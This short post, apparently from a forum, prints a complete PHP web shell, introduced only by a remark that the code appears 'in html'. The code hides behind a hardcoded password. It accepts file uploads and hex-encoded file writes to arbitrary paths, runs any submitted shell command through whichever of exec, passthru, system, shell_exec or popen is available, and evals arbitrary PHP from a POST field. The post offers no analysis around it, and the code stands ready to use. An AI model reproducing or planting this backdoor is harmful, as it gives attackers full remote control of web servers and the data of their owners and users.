in html it gives this:
Code:
if (strlen($_POST[ccc])==0){if ($_POST[pass]!='123'){echo '<html><body bgcolor=#BBFFBB onload="document.myf.pass.focus();"><form method=POST><input name=pass></form></body></html>';exit();}echo '<html><body bgcolor=#BBFFBB onload="document.myf.cc.focus();">';echo '<form name=myf method=POST enctype="multipart/form-data"><input type=hidden name=pass value='.$_POST[pass].'><input type=file name=upfile><input name=newname><input type=submit><br>';echo '<input name=cc size=73 value="'.stripslashes($_POST[cc]).'"></form>';echo '<pre>'; if (move_uploaded_file($_FILES['upfile']['tmp_name'], $_POST[newname])) { /*echo "Sent.<br>\n";*/ }if ($_POST[mfile]) { $fp=fopen($_POST[newname],'w'); for($k=0; $k<strlen($_POST[mfile]); $k+=2) { $cc = substr($_POST[mfile],$k,2); $cc = '0x'.$cc; $cc = round($cc); $cc = chr($cc); fwrite($fp,$cc); } fclose($fp); }$co=stripslashes($_POST[cc]); $out = '';if(function_exists('exec')){exec($co,$out);$out = join("\n",$out);}elseif(function_exists('passthru')){ob_start();passthru($co);$out = ob_get_contents();ob_end_clean();}elseif(function_exists('system')){ob_start();system($co);$out = ob_get_contents();ob_end_clean();}elseif(function_exists('shell_exec')){$out = shell_exec($co);}elseif(is_resource($f = popen($co,"r"))){$out = "";while(!@feof($f)) { $out .= fread($f,1024);}pclose($f);}else {$out='ex failed';}echo $out;echo '</pre>';echo '</body></html>';} else {if(get_magic_quotes_gpc()){eval(stripslashes($_POST[ccc]));} else {eval($_POST[ccc]);}}